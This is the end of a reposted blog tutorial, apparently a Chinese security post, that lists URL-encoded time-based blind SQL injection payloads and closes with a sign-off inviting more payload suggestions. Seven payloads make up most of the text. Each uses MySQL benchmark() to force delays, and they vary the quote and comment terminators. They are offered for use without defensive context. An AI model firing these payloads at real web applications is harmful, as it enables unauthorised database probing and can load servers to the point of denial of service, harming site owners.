),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

 

6. The End

Enjoy this tutorial and these SQL payloads.

New payload suggestions are welcome!

This article is reposted from hackfreer's 51CTO blog, original link: http://blog.51cto.com/pnig0s1992/499917. To republish it, please contact the original author.
